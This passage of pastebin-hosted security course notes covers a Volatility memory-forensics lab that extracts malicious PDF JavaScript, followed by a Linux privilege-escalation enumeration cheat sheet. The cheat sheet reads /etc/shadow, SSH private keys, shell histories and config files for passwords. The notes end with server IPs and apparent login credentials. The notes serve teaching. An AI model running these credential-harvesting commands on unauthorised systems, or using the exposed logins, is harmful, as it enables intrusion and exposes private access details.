  2057. Name the word document 'YourFirstName-YourLastName-LinuxDay4-ShellScripting.docx' (ex: 'Joseph-McCray-LinuxDay3-ShellScripting.docx')
  2058. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  2059.  
  2060.  
  2061. Task Option 2: Python3
  2062. ---------------------------------------
  2063. Watch and do all of the exercises in the first 7 videos from https://www.youtube.com/playlist?list=PLypxmOPCOkHVzhKRcWzEkQXCnmHezGVeB
  2064. Create a word document that contains the screenshots of the tasks performed in these videos
  2065. Name the word document 'YourFirstName-YourLastName-LinuxDay4-Python3.docx' (ex: 'Joseph-McCray-LinuxDay3-Python3.docx.docx')
  2066. Email the document to me at joe-at-secureninja-dot-com before the start of class tomorrow
  2067.  
  2068.  
  2069.  
  2070.  
  2071. ####################
  2072. ############################## # Day 5: Challenge # ##############################
  2073. ####################
  2074.  
  2075.  
  2076.  
  2077.  
  2078.  
  2079.  
  2080.  
  2081.  
  2082.  
  2083.  
  2084.  
  2085.  
  2086.  
  2087.  
  2088.  
  2089.  
  2090.  
  2091.  
  2092.  
  2093.  
  2094.  
  2095.  
  2096.  
  2097.  
  2098.  
  2099.  
  2100.  
  2101.  
  2102.  
  2103.  
  2104.  
  2105.  
  2106.  
  2107.  
  2108.  
  2109.  
  2110.  
  2111.  
  2112.  
  2113.  
  2114.  
  2115.  
  2116. ###################
  2117. # Memory Analysis #
  2118. ###################
  2119. ---------------------------Type This-----------------------------------
  2120. cd ~/Desktop/
  2121.  
  2122. sudo apt-get install -y foremost tcpxtract
  2123.  
  2124. wget https://infosecaddicts-files.s3.amazonaws.com/hn_forensics.vmem
  2125.  
  2126. git clone https://github.com/volatilityfoundation/volatility.git
  2127.  
  2128. cd volatility
  2129. sudo pip install distorm3
  2130. sudo python setup.py install
  2131. python vol.py -h
  2132. python vol.py pslist -f ~/Desktop/hn_forensics.vmem
  2133. python vol.py connscan -f ~/Desktop/hn_forensics.vmem
  2134. mkdir dump/
  2135. mkdir -p output/pdf/
  2136. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
  2137. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
  2138. ***Takes a few min***
  2139. strings 1752.dmp | grep "^http://" | sort | uniq
  2140. strings 1752.dmp | grep "Ahttps://" | uniq -u
  2141. cd ..
  2142. foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
  2143. cd ~/Desktop/volatility/output/pdf/
  2144. cat audit.txt
  2145. cd pdf
  2146. ls
  2147. grep -i javascript *.pdf
  2148.  
  2149.  
  2150.  
  2151. cd ~/Desktop/volatility/output/pdf/
  2152. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  2153. unzip pdf-parser_V0_6_4.zip
  2154. python pdf-parser.py -s javascript --raw pdf/00601560.pdf
  2155. python pdf-parser.py --object 11 00600328.pdf
  2156. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
  2157.  
  2158. cat malicious.js
  2159. -----------------------------------------------------------------------
  2160.  
  2161.  
  2162.  
  2163.  
  2164. *****Sorry - no time to cover javascript de-obfuscation today*****
  2165.  
  2166.  
  2167.  
  2168.  
  2169. ---------------------------Type This-----------------------------------
  2170. cd ~/Desktop/volatility
  2171. mkdir files2/
  2172. python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
  2173. python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
  2174. python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  2175. -----------------------------------------------------------------------
  2176.  
  2177.  
  2178. ######################
  2179. ----------- ############### # Intro to Reversing # ############### -----------
  2180. ######################
  2181. Lab walk-through documents are in the zip file along with the executables that need to be reversed:
  2182. https://infosecaddicts-files.s3.amazonaws.com/Lena151.zip
  2183.  
  2184.  
  2185.  
  2186.  
  2187.  
  2188. ##############################
  2189. # Linux For InfoSec Homework #
  2190. ##############################
  2191. In order to receive your certificate of attendance you must complete the all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.
  2192.  
  2193.  
  2194. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx)
  2195.  
  2196.  
  2197.  
  2198.  
  2199. ##############################
  2200. # Linux For InfoSe Challenge #
  2201. ##############################
  2202.  
  2203. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).
  2204.  
  2205. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx)
  2206.  
  2207.  
  2208.  
  2209.  
  2210. IMPORTANT NOTE:
  2211. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.
  2212.  
  2213.  
  2214. #########################################################################
  2215. # What kind of Linux am I on and how can I find out? #
  2216. # Great reference: #
  2217. # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #
  2218. #########################################################################
  2219. - What’s the distribution type? What version?
  2220. -------------------------------------------
  2221. cat /etc/issue
  2222. cat /etc/*-release
  2223. cat /etc/lsb-release # Debian based
  2224. cat /etc/redhat-release # Redhat based
  2225.  
  2226.  
  2227.  
  2228. - What’s the kernel version? Is it 64-bit?
  2229. -------------------------------------------
  2230. cat /proc/version
  2231. uname -a
  2232. uname -mrs
  2233. rpm -q kernel
  2234. dmesg | grep Linux
  2235. ls /boot | grep vmlinuz-
  2236.  
  2237.  
  2238.  
  2239. - What can be learnt from the environmental variables?
  2240. ----------------------------------------------------
  2241. cat /etc/profile
  2242. cat /etc/bashrc
  2243. cat ~/.bash_profile
  2244. cat ~/.bashrc
  2245. cat ~/.bash_logout
  2246. env
  2247. set
  2248.  
  2249.  
  2250. - What services are running? Which service has which user privilege?
  2251. ------------------------------------------------------------------
  2252. ps aux
  2253. ps -ef
  2254. top
  2255. cat /etc/services
  2256.  
  2257.  
  2258. - Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
  2259. ---------------------------------------------------------------------------------------------------------------
  2260. ps aux | grep root
  2261. ps -ef | grep root
  2262.  
  2263.  
  2264.  
  2265. - What applications are installed? What version are they? Are they currently running?
  2266. ------------------------------------------------------------------------------------
  2267. ls -alh /usr/bin/
  2268. ls -alh /sbin/
  2269. dpkg -l
  2270. rpm -qa
  2271. ls -alh /var/cache/apt/archivesO
  2272. ls -alh /var/cache/yum/
  2273.  
  2274.  
  2275. - Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
  2276. ------------------------------------------------------------------------------------
  2277. cat /etc/syslog.conf
  2278. cat /etc/chttp.conf
  2279. cat /etc/lighttpd.conf
  2280. cat /etc/cups/cupsd.conf
  2281. cat /etc/inetd.conf
  2282. cat /etc/apache2/apache2.conf
  2283. cat /etc/my.conf
  2284. cat /etc/httpd/conf/httpd.conf
  2285. cat /opt/lampp/etc/httpd.conf
  2286. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
  2287.  
  2288.  
  2289.  
  2290. - What jobs are scheduled?
  2291. ------------------------
  2292. crontab -l
  2293. ls -alh /var/spool/cron
  2294. ls -al /etc/ | grep cron
  2295. ls -al /etc/cron*
  2296. cat /etc/cron*
  2297. cat /etc/at.allow
  2298. cat /etc/at.deny
  2299. cat /etc/cron.allow
  2300. cat /etc/cron.deny
  2301. cat /etc/crontab
  2302. cat /etc/anacrontab
  2303. cat /var/spool/cron/crontabs/root
  2304.  
  2305.  
  2306. - Any plain text usernames and/or passwords?
  2307. ------------------------------------------
  2308. grep -i user [filename]
  2309. grep -i pass [filename]
  2310. grep -C 5 "password" [filename]
  2311. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Search for Joomla passwords
  2312.  
  2313.  
  2314. - What NIC(s) does the system have? Is it connected to another network?
  2315. ---------------------------------------------------------------------
  2316. /sbin/ifconfig -a
  2317. cat /etc/network/interfaces
  2318. cat /etc/sysconfig/network
  2319.  
  2320.  
  2321. - What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
  2322. ------------------------------------------------------------------------------------------------------------------------
  2323. cat /etc/resolv.conf
  2324. cat /etc/sysconfig/network
  2325. cat /etc/networks
  2326. iptables -L
  2327. hostname
  2328. dnsdomainname
  2329.  
  2330. - What other users & hosts are communicating with the system?
  2331. -----------------------------------------------------------
  2332. lsof -i
  2333. lsof -i :80
  2334. grep 80 /etc/services
  2335. netstat -antup
  2336. netstat -antpx
  2337. netstat -tulpn
  2338. chkconfig --list
  2339. chkconfig --list | grep 3:on
  2340. last
  2341. w
  2342.  
  2343.  
  2344.  
  2345. - Whats cached? IP and/or MAC addresses
  2346. -------------------------------------
  2347. arp -e
  2348. route
  2349. /sbin/route -nee
  2350.  
  2351.  
  2352. - Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
  2353. ------------------------------------------------------------------------------------------
  2354. id
  2355. who
  2356. w
  2357. last
  2358. cat /etc/passwd | cut -d: -f1 # List of users
  2359. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
  2360. awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
  2361. cat /etc/sudoers
  2362. sudo -l
  2363.  
  2364.  
  2365.  
  2366. - What sensitive files can be found?
  2367. ----------------------------------
  2368. cat /etc/passwd
  2369. cat /etc/group
  2370. cat /etc/shadow
  2371. ls -alh /var/mail/
  2372.  
  2373.  
  2374.  
  2375. - Anything “interesting” in the home directorie(s)? If it’s possible to access
  2376. ----------------------------------------------------------------------------
  2377. ls -ahlR /root/
  2378. ls -ahlR /home/
  2379.  
  2380.  
  2381. - Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
  2382. ---------------------------------------------------------------------------------------------------------------------------
  2383. cat /var/apache2/config.inc
  2384. cat /var/lib/mysql/mysql/user.MYD
  2385. cat /root/anaconda-ks.cfg
  2386.  
  2387.  
  2388. - What has the user being doing? Is there any password in plain text? What have they been edting?
  2389. -----------------------------------------------------------------------------------------------
  2390. cat ~/.bash_history
  2391. cat ~/.nano_history
  2392. cat ~/.atftp_history
  2393. cat ~/.mysql_history
  2394. cat ~/.php_history
  2395.  
  2396.  
  2397.  
  2398. - What user information can be found?
  2399. -----------------------------------
  2400. cat ~/.bashrc
  2401. cat ~/.profile
  2402. cat /var/mail/root
  2403. cat /var/spool/mail/root
  2404.  
  2405.  
  2406. - Can private-key information be found?
  2407. -------------------------------------
  2408. cat ~/.ssh/authorized_keys
  2409. cat ~/.ssh/identity.pub
  2410. cat ~/.ssh/identity
  2411. cat ~/.ssh/id_rsa.pub
  2412. cat ~/.ssh/id_rsa
  2413. cat ~/.ssh/id_dsa.pub
  2414. cat ~/.ssh/id_dsa
  2415. cat /etc/ssh/ssh_config
  2416. cat /etc/ssh/sshd_config
  2417. cat /etc/ssh/ssh_host_dsa_key.pub
  2418. cat /etc/ssh/ssh_host_dsa_key
  2419. cat /etc/ssh/ssh_host_rsa_key.pub
  2420. cat /etc/ssh/ssh_host_rsa_key
  2421. cat /etc/ssh/ssh_host_key.pub
  2422. cat /etc/ssh/ssh_host_key
  2423.  
  2424.  
  2425. - Any settings/files (hidden) on website? Any settings file with database information?
  2426. ------------------------------------------------------------------------------------
  2427. ls -alhR /var/www/
  2428. ls -alhR /srv/www/htdocs/
  2429. ls -alhR /usr/local/www/apache22/data/
  2430. ls -alhR /opt/lampp/htdocs/
  2431. ls -alhR /var/www/html/
  2432.  
  2433.  
  2434. - Is there anything in the log file(s) (Could help with “Local File Includes”!)
  2435. -----------------------------------------------------------------------------
  2436. cat /etc/httpd/logs/access_log
  2437. cat /etc/httpd/logs/access.log
  2438. cat /etc/httpd/logs/error_log
  2439. cat /etc/httpd/logs/error.log
  2440. cat /var/log/apache2/access_log
  2441. cat /var/log/apache2/access.log
  2442. cat /var/log/apache2/error_log
  2443. cat /var/log/apache2/error.log
  2444. cat /var/log/apache/access_log
  2445. cat /var/log/apache/access.log
  2446. cat /var/log/auth.log
  2447. cat /var/log/chttp.log
  2448. cat /var/log/cups/error_log
  2449. cat /var/log/dpkg.log
  2450. cat /var/log/faillog
  2451. cat /var/log/httpd/access_log
  2452. cat /var/log/httpd/access.log
  2453. cat /var/log/httpd/error_log
  2454. cat /var/log/httpd/error.log
  2455. cat /var/log/lastlog
  2456. cat /var/log/lighttpd/access.log
  2457. cat /var/log/lighttpd/error.log
  2458. cat /var/log/lighttpd/lighttpd.access.log
  2459. cat /var/log/lighttpd/lighttpd.error.log
  2460. cat /var/log/messages
  2461. cat /var/log/secure
  2462. cat /var/log/syslog
  2463. cat /var/log/wtmp
  2464. cat /var/log/xferlog
  2465. cat /var/log/yum.log
  2466. cat /var/run/utmp
  2467. cat /var/webmin/miniserv.log
  2468. cat /var/www/logs/access_log
  2469. cat /var/www/logs/access.log
  2470. ls -alh /var/lib/dhcp3/
  2471. ls -alh /var/log/postgresql/
  2472. ls -alh /var/log/proftpd/
  2473. ls -alh /var/log/samba/
  2474.  
  2475. - Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
  2476.  
  2477.  
  2478.  
  2479.  
  2480.  
  2481. ########################################################################################################################################
  2482.  
  2483.  
  2484.  
  2485.  
  2486.  
  2487. ####################################
  2488. # Day 2: Building a Perfect Server #
  2489. ####################################
  2490. -------------------------------------------
  2491. Task 1: Log in to your respective Linux server
  2492. PMRF1 (Hugo/Ross)
  2493. 45.76.61.100
  2494. pmrf aegisashore
  2495.  
  2496. PMRF2 (steve/jeff)
  2497. 155.138.213.248
  2498. pmrf aegisashore
  2499.  
  2500.  
  2501. PMRF3 (elaine)
  2502. 155.138.198.202
  2503. pmrf aegisashore
  2504.  
  2505.  
  2506.  
  2507. Task 2: Build the Perfect Server
  2508. https://www.howtoforge.com/tutorial/perfect-server-centos-7-apache-mysql-php-pureftpd-postfix-dovecot-and-ispconfig/
  2509.  
  2510. Important notes:
  2511. Steps to skip
  2512. skip all of step 1
  2513. skip all of step 2
  2514. skip all of step 3
  2515. skip all of step 5
  2516.  
  2517. Important notes:
  2518. step 11 amavisd may not work. If it doesn't work just keep moving forward
  2519. ---------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement